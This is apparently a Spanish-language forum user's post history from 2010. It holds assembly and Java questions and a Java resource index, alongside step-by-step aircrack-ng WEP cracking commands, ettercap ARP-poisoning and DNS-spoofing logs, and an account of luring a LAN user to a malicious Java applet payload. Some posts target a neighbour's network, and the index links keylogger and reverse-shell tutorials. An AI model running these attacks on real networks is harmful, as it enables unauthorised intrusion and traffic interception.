|
51
|
Programación / ASM / Problema al escribir archivo con sys_call numero 8
|
en: 3 Julio 2010, 17:28 pm
|
Bueno, por fin cuando ya estoy metido de lleno en el mundo de programación con asm, se me presentan los tipicos problemas de logica por falta de conocimiento, que me pasaron cuando estuve en Basi, en Java y en C++. Bueno el codigo que me deducido es el siguiente: section .data hello db 'Hello, world!',10 ; Our dear string helloLen equ $ - hello ; Length of our dear string dataSecond db 'Datos escritos correctamente',10 dataLen equ $ - dataSecond file db '/root/archivo.txt',10 section .text global _start _start: pop ebx pop ebx pop ebx ;arg[3] o el directorio del archivo a escribir en ebx mov eax,8 ; Syscall a creat mov ecx,00644Q ; Permisos de lectura en Octal (rw_rw_rw_) int 0x80 ; Llamada al kernel de Linux ; Ahora tenemos el file descriptor o handler del archivo selecionado en ebx test eax,eax ; Igualamos si el file descriptor es correcto js skipWrite call fileWrite ; Primer procedimiento de escritura call fileWSegundo ; Segundo procedimiento de escritura skipWrite: mov ebx,eax ; Guardamos el error en ebx mov eax,1 ; Syscall 1 - Finalizar ejecucion int 0x80 ; llamamos al kernel ; proc fileWrite - write a string to a file fileWrite: mov ebx,eax ; sys_creat devuelve un handler de archivos en eax, lo ponemos en ebx mov eax,4 ; sys_write ; ebx is already set up mov ecx,hello ; La cadena de texto en ecx, como tercer argumento de la función mov edx,helloLen ; la length de nuestra cadena definida como constante con equ int 0x80 fileWSegundo: mov ebx,eax ; sys_creat devuelve un handler de archivos en eax, lo ponemos en ebx mov eax,4 ; sys_write mov ecx,dataSecond mov edx,dataLen int 0x80 mov eax,6 ; sys_close int 0x80 ret ; No se para que sirve pero lo he visto en mas programas :S ; endp fileWrite
La cosa es que no me escribe dicho archivo, he querido crear dos procedimientos para escribir por separado, por mero aprendizaje, el ver que puedo separar la runtime en varios procedimientos, no mas que eso. Alguien me podria orientar? Y explicarme que hace el ret
|
|
|
52
|
Foros Generales / Foro Libre / Que no cunda el pánico! Te has auto-hackeado! xD
|
en: 3 Julio 2010, 16:45 pm
|
Os voy a contar una anécdota curiosa que me acaba de pasar xD estaba yo tan tranquilo viendo documentos por aqui, por la web, cuando de repente leí uno sobre cosas que facilitan la vida en una shell remota, la cosa es que vi la de dejar una notita del sistema comprometido, y cojí y la probé: echo "Hola, su servidor ha sido comprometido, para más información ejecute 'nc localhost 5555'" > mensaje wall < mensaje nc -l -p 5555 -vv Sonó el beep de la bios, y nada, dije, esto que no funciona que esta deprecated.... Pasaron las hora sy olvidé completamente que lo habia hecho, es mas ni leí el comando, ni me dispuse a ve que habia ocurrido, cuando en mi escritorio veo un archivo mensaje... Que coño es esto? MMM voy a abrirlo... Mi sistema ha sido comprometido? Que raro, sie xtremo precauciones y no ofrezco ningun servicio remoto :S Me dispuse a buscar simbolos de evidencia de dicho ataque, cuando tras examinar archivos temporales, puertos abiertos, posibles modificaciones de cron, shells corriendo en un puerto y nada... Menudo pedazo de hacker el tio... Ha entrado por donde no se puede :S Mmmm quizás tenga alguna sesión de meterpreter o reverse_shell en algun puerto veamos.... Nop no tengo ningun puerto a la escucha... Que diablos pasa? Por ingenieria social? Imposible, no me han pasado nada y no ejecuto applets si no estoy seguro... Para cuando se me ocurre encender firefox y abrir la sesion anterior y tengo en la primera pagina, dicho mensaje... Que Pwn3ada.... Madre mia que cabeza la mia... Espero que esta anécdota sirva para que la gente no ejecute comandos de tutos al tuntún... Saludos xDD
|
|
|
53
|
Seguridad Informática / Wireless en Linux / Trafico de red extraño :S
|
en: 2 Julio 2010, 13:59 pm
|
Hola a todos, desde ayer por la tarde he notado incidencias en la red, pues de entrada los vids de youtube se paran, internet va algo mas lento y las paginas se quedan cargando indefinidamente, la cosa es que me puse a investigar el trafico de red con wireshark y para mi sopresa vi que habia mil y un paquetes de red, sin estar haciendo nada con internet, aqui os dejo la imagen: Es normal tener ese trafico de red estando sin conexiones? Os puedo enviar tambien lo que capturé con el sniffer, pero es algo asi como la imagen mostrada todo el tiempo. Comentar que me bota del msn cada dos por 3 y se vuelve a conectar, no se que le pasa a mi red, esta loca xD Parece como si alguien estuviese doseandola. Saludos
|
|
|
54
|
Programación / Java / Sobre sistemas distribuidos!
|
en: 2 Julio 2010, 01:34 am
|
Hola a todos, voy a abrir este post para discutir sobre sistemas distribuidos y tecnologias como VPN bajo java.
La cosa es la siguiente llevo como 2 meses comiendome la cabeza intentando averiguar una manera de realizar un calculo utilizando varios ordenadores, con un software programado por mi.
He leido acerca de una api Jini, pero no me da lo que busco.
Alguien ha experimentado con estas tecnologias?
Saludos
|
|
|
55
|
Programación / Java / [F.A.Q.]Entry point [Sources, Guias, Manuales, Tutoriales y demás...]
|
en: 30 Junio 2010, 18:47 pm
|
INDICE DE TEMAS INTERESANTES Y FAQ
Bueno, para estrenarme como MOD de seción os hago un recopilatorio con los temas mas interesantes clasificados, según intereses: Normas (Muy importante, lectura obligatoria)http://foro.elhacker.net/java/reglas_del_foro_iexclleed_todos-t163024.0.html Por donde empezar...Que es Java?http://es.wikipedia.org/wiki/Lenguaje_de_programaci%C3%B3n_Java------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Descarga de Java [Última versión]http://www.java.com/es/download/------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Guia de java [Completísima, todo tipo de tips, lo necesario para aprender java]http://foro.elhacker.net/java/manual_java_basico_pdf_y_1027_paginas-t206793.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Referencia, ejemplos de uso y demás tips muy interesantes del compañero de esta web Chuidianghttp://www.chuidiang.com/java/index.php------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Ejercicios de Java: Teoria + Ejemploshttp://foro.elhacker.net/java/ejercicios_java_teoriaejemplos-t34891.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Problemas comunes solucionadosComo usar varios hilos en una clase?http://foro.elhacker.net/java/como_usuar_varios_hilos_en_una_clase_solucionado-t297844.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Solución a ejercicios de herenciahttp://foro.elhacker.net/java/ayuda_con_ejercicios_de_herencia-t297705.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Conexión con MySql en Netbeans IDEhttp://foro.elhacker.net/java/conexion_de_sql_y_netbeans_ayuda-t297581.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Arrays en Javahttp://foro.elhacker.net/java/arrays_en_java_como_usarlo-t295753.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Manejo de archivos de texto en Javahttp://foro.elhacker.net/java/manejar_archivo_txt_desde_java_ingresar_datos_modificar_datos_buscar_datos_y-t295430.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Manejo de fechas en Javahttp://foro.elhacker.net/java/manejo_de_fechas_date-t295826.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Crear un paquete Jarhttp://foro.elhacker.net/java/como_crear_un_paquete_jar_en_java-t295598.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Sources y guias interesantesComo conectar Java con Twitter por DDKhttp://foro.elhacker.net/java/tutorial_twitter_java-t298356.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Tomar captura de Imagen desde camara Webhttp://foro.elhacker.net/java/tomar_una_foto_desde_una_webcam-t285457.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Keylogger en Javahttp://foro.elhacker.net/java/tutorial_keylogger_en_java_jni-t275565.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- JNA en java: Ejecuta codigo en C++ para java!http://foro.elhacker.net/java/jna_y_manipulacion_de_apis_de_windows_en_java-t282170.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Auto-completer JCombo-Boxhttp://foro.elhacker.net/java/aporte_autocompler_en_un_jcombobox-t290429.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Clase JDBC para interactura con bases de datoshttp://foro.elhacker.net/java/clase_para_conectar_a_una_base_de_datos_e_interactuar_con_ella_jdbc_mysql-t262661.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Ver lista de procesos bajo plataformas Win32http://foro.elhacker.net/java/aporte_by_4ng3r_ver_procesos_de_windows-t285166.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Base para crear un instalador desde Javahttp://foro.elhacker.net/java/base_para_crear_un_instalador_desde_java-t299811.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Crear interfaces gráficas con Look and Feel en javahttp://foro.elhacker.net/java/como_crear_interfaces_graficas_con_look_and_feel_en_java-t147610.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Reverse Shell para Windowhttp://foro.elhacker.net/java/reverse_shell_para_windows_en_java-t263198.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Java, C, DLL (y Rock 'n Roll xD)http://foro.elhacker.net/java/aporte_by_4ng3rjava_c_y_dll-t284914.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Java Speaker: Creación de voz con Javahttp://foro.elhacker.net/java/aporte_by_4ng3r_crear_voz_con_java-t285294.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Solucionador de ecuaciones 2º grado (Defectuoso) xDhttp://foro.elhacker.net/java/aporte_solucionador_de_ecuaciones_de_2o_grado-t275207.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Obtener información sistema operativo desde Javahttp://casidiablo.net/capturar-informacion-sistema-operativo-java/------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Creación de un sniffer en Javahttp://foro.elhacker.net/java/tutorial_1primer_paso_para_crear_un_sniffer_en_java-t280567.0.html - Parte #2 (Conceptos avanzados)
http://foro.elhacker.net/java/tutorialcreacion_de_un_sniffer_pasos_avanzados_2-t280634.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Lectura de archivos XML (Clase BETA)http://foro.elhacker.net/java/clase_beta_lectura_por_tags_archivos_xml-t263818.0.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Eso es todo, se irá añadiendo lo nuevo y viejo que se haya pasado por alto. Gracias a la comunidad de elhacker.net por brindarme esta oportunidad, especialmente a el-brujo por dedicarme un poco de su tiempo para darme este puesto, en el cual voy a trabajar muy duro, todo lo que se pueda, se hará. Saludos Actualizado el 30-06-2010 a las 19:16.
|
|
|
56
|
Seguridad Informática / Wireless en Linux / NO consigo paquetes IV con aircrak suite!
|
en: 30 Junio 2010, 13:33 pm
|
Que mosqueo llevo encima, algunos AP soy capaz de crackearlos, a veces se puede avaces no, con el mismo AP, otras ni siquiera capturo datas.... Que decir... Tras pelearme con mi tester y conseguir hacerlo tras un rato de pruebas, me dispongo a intentarlo con otro AP: airodump-ng -w wep -c 1 --bssid 00:22:______ mon0CH 1 ][ Elapsed: 21 mins ][ 2010-06-30 13:24 ][ fixed channel mon0: 11
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:_________ -58 100 12748 1824 0 1 54e. WEP WEP OPN WLAN25D518
BSSID STATION PWR Rate Lost Packets Probes
Caputar datas de vez en cuando, pero no es viable tardaria mucho tiempo asi :S aireplay-ng -1 0 -a 00:22_______ mon0No source MAC (-h) specified. Using the device MAC (00:08:________________) 12:51:02 Waiting for beacon frame (BSSID: 00:22:____________) on channel 11
12:51:02 Sending Authentication Request (Open System) [ACK] 12:51:02 Authentication successful 12:51:02 Sending Association Request [ACK] 12:51:02 Association successful :-) (AID: 1)
Y supuestamente ya estoy asociado, ahora a inyectar trafico no? aireplay-ng -3 -b 00:22:____________ mon0No source MAC (-h) specified. Using the device MAC (00:08______________) 13:06:37 Waiting for beacon frame (BSSID: 00:22:________________) on channel 1 Saving ARP requests in replay_arp-0630-130637.cap You should also start airodump-ng to capture replies. 14303 packets (got 0 ARP requests and 134 ACKs), sent 0 packets...(0 pps) Y por mas que espero no suben los datas, en algunos AP suben, pero esperando, a veces al instante, otras tengo que hacer cosas con el ataque fragmentation, o me da la sensacion de que se arregla con eso, pero no actua igual en todos los ap. Alguna idea? Si me podeis decir que pauta a seguri, porque no se si lo estoy haciendo bien, y mirad que he leido y leido que no veas, y nada, tan facil que dicen todos que es... Saludos
|
|
|
57
|
Seguridad Informática / Hacking / Intento de Spoofeo...
|
en: 29 Junio 2010, 15:56 pm
|
Hola a todos, para los que hayan seguido mi ataque a una red y para los que no, aqui viene mi sigueinte problema.... Tras crackear el wifi, escanear en busca de vulnerabilidades, en los PC de la lan, y no encontrar nada, viene la ingenieria social, he infectado una web con su applet, y este lanza un payload en el handler cuando se acepta, es el famoso java applet infection. La cosa es que para conducir a mi supuesta victima a dicha IP donde tengo el server web corriendo, he usado la tecnica de DNS spoofing, pero algo debe estar funcionando mal puesto que no hace el ARP Poisoning correctamente, la cosa es la siguiente, en otras circunstancias si que lo hacia bien, ahora hago un chk_poison para ver que todo ha ido bien y no me dice nada bueno, sin embargo en otras redes si que iba :s Os dejo el log de la consola ettercap: Listening on wlan0... (Ethernet)
wlan0 -> 00:08:D3:38:AE:6E 192.168.1.131 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file Privileges dropped to UID 65534 GID 65534...
etter.dns:36 Invalid ip address 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... 4 hosts added to the hosts list... Host 192.168.1.1 added to TARGET1 Host 192.168.1.128 added to TARGET2
ARP poisoning victims:
GROUP 1 : 192.168.1.1 00:15:F2:F0:32:CD
GROUP 2 : 192.168.1.128 00:16:6F:B9:09:2C Starting Unified sniffing...
Activating dns_spoof plugin... Activating chk_poison plugin... chk_poison: Checking poisoning status... chk_poison: No poisoning between 192.168.1.128 -> 192.168.1.1
He selecionado las targets correctamente y nada. Alguna idea? Comentar que esto lo hago entre mis pcs en mi lan, la PS3, el netbook y 2 pc mas. Cabe mencionar que estoy lejos del AP, tengo un 30% de señal y pierdo frecuentemente la conexion, creo que es por la lejania. Saludos
|
|
|
58
|
Informática / Electrónica / Duda sobre especificaciones Transistor NPN 2N3904
|
en: 27 Junio 2010, 15:37 pm
|
Buenas a todos, he adquirido un paquete con ciertos componentes electronicos para la etapa de potencia de un robot volador. Tengo en concreto un Transistor NPN, del cual no entiendo las especificaciones, pues tengo los siguientes datos: VCBO Collector-Base Voltage (IE = 0) 60 V VCEO Collector-Emitter Voltage (IB = 0) 40 V VEBO Emitter-Base Voltage (IC = 0) 6 V IC Collector Current 200 mA Ptot Total Dissipation at TC = 25 oC 625 mW Tstg Storage Temperature -65 to 150 oC Tj Max. Operating Junction Temperature 150 oC No entiendo exactamente a que se refiere con collector-base voltage y collector emiter, tengo una idea, pero estoy acostumbrado a que me den una intensidad o un voltaje para los mosfte y me digan con tanto estimulas el base y el colector transmite al emisor y asi amplificas corrientes, no estoy muy hecho a consultar datasheet. Si alguien me lo puede aclarar, se lo agradeceria. Saludos y gracias
|
|
|
59
|
Seguridad Informática / Hacking / [Seguimiento] Caso de hacking practico
|
en: 25 Junio 2010, 15:21 pm
|
Hola a todos, intentando asaltar uan red para llegar hasta el PC, decir que estoy totalmente autorizado a hacerlo, he conseguido llegar la lan interna de dicha red, primero hakeando el sistema wifi, y entrando en la WLAN con el aircrack suite!
Os explico lo que he hecho:
Escaneamos redes con:
airodump-ng mon0
Escojemos nuestra red para crackear:
Su canal y maca incluidas:
airodump-ng -w wep -c 11 --bssid 00:15:F2:F0:32:CD mon0
Hacemos una falsa autentificación:
aireplay-ng -1 0 -a 00:15:F2:F0:32:CD mon0
Capturamos replies:
aireplay-ng -3 -b 00:15:F2:F0:32:CD mon0
Generamos trafico en caso de que no haya clientes:
aireplay-ng -3 -b 00:15:F2:F0:32:CD -h 00:08:D3:38:AE:6E mon0
Si hace falta reforzamos la des-autentificación:
aireplay-ng -1 0 -a 00:15:F2:F0:32:CD mon0
Y veremos como suben los IVS! Y listo para crackear con aircrack-ng
Son mis apuntes extraidos para el ataque, la cosa es que estando una vez en su lan, tengo que encontrar algun vector de ataque para saltar al nivel de maquina, la cosa es la siguiente:
He hecho un mapeo de la lan con lanmap, y he sacado una grafica, que me ha aclarado las ideas bastante bien.
Posteriormente he identificado 2 equipos aparte del mio en dicha red, uno que me daba como un BSD, y resulto ue era un PS3 conectada a la wlan y un windows XP: Win2k SP2
La cosa esta en que he escaneado con OpenVas, el ordenador de esa Lan y la unica advertice que he encontrado ha sido una ms03_34 de riesgo low, que no es explotable en este momento.
He estado sniffando la red y buscando datos comprometedores pero el ettercap con arp poisoning y el router en el TARGET 2 y el equipo en el TARGET 1, no capta nada por mas que navegan por la red, pues veo las paquetes, y puedo apreciar datos de formularios.
He escaneado los puertos de los equipos de la red y no hay nada activo en los PC´s, asi descarto un posible exploit, en todo caso estaba esperanzado de entrar por el bug de netapi de SMB en el puerto 445 pero no hubo suerte.
He jugado spoofeando dns y volviendo loco al propietario llevandolo a webs de caracter obsceno y extraño que ha provocado poco mas que una situacion curiosa xD
Que me recomendais hacer ahora una vez estoy en este punto?
Saludos
|
|
|
60
|
Seguridad Informática / Wireless en Linux / [Seguimientos/Crónicas]Cracking wifi - Ataque básico
|
en: 24 Junio 2010, 17:40 pm
|
ATAQUE WIFI BÁSICO Hola a todos, hoy me he propuesto crackear la contraseña del wifi, de mi vecino, que por supuesto tengo permiso, me he informado, he leido, he estudiado y he llegado a la conclusion del siguiente ataque: Primero de todo analizo el perimetro de redes wifi: airodump-ng mon0 CH 11 ][ Elapsed: 1 min ][ 2010-06-24 17:22
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:___________ -49 33 29 0 1 54e. WEP WEP OPN WLAN_____ 00:15:___________-82 46 0 0 11 54 WEP WEP Jazztel ______
BSSID STATION PWR Rate Lost Packets Probes
00:22:___________ 00:08:___________ 0 1e- 1e 606 156 WLAN______
Bieeen tengo la red que yo queria crackear, en mi caso Jazztel _____, por tanto me centro en su canal de comunicacion: airodump-ng -w wep -c 11 --bssid 00:15:___________ mon0Y empiezo a ver sus datos concretos: CH 11 ][ Elapsed: 5 mins ][ 2010-06-24 17:29 ][ fixed channel mon0: 1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:15:___________ -80 4 1830 0 0 11 54 WEP WEP OPN Jazztel ___
BSSID STATION PWR Rate Lost Packets Probes
00:15:___________ 00:08:___________ 0 1 - 1 0 9
Ahora empieza el ataque para comenzar a capturar paquetes, para lo cual, primero tengo que inyectarle y hacer una autentificación falsa: aireplay-ng -1 0 -a 00:15:___________ mon0Y la asociacion de AP transcurre satisfactoriamente: No source MAC (-h) specified. Using the device MAC (00:08:___________) 17:28:02 Waiting for beacon frame (BSSID: 00:15:___________) on channel 11
17:28:02 Sending Authentication Request (Open System) [ACK] 17:28:02 Authentication successful 17:28:02 Sending Association Request [ACK] 17:28:02 Association successful :-) (AID: 1)
Ahora empieza la captura de trafico y arp: aireplay-ng -3 -b 00:15:___________ mon0No source MAC (-h) specified. Using the device MAC (00:08:___________) 17:25:46 Waiting for beacon frame (BSSID: 00:15:___________) on channel 11 Saving ARP requests in replay_arp-0624-172546.cap You should also start airodump-ng to capture replies. 2007 packets (got 0 ARP requests and 20 ACKs), sent 0 packets...(0 pps) Y por mucho que espero no suben los data, estudiando la situación he llegado a la conclusion de que esto ocurre porque no hay ningun cliente asociado que genere trafico de red, y creo que eso se hace en el punto dos de mi ataque, lo que ocurre es que me autentifico falso y al rato me kickea de la falsa autentificación. Esto es una guia de ataque básico y al mismo tiempo mi duda. Alguien sabe como puedo solventar este problema sin tener que esperar a que mi vecino empieze a navegar/descargar, en general usar su red? Saludos y gracias por vuestra atención.
|
|
|
|
|
|
|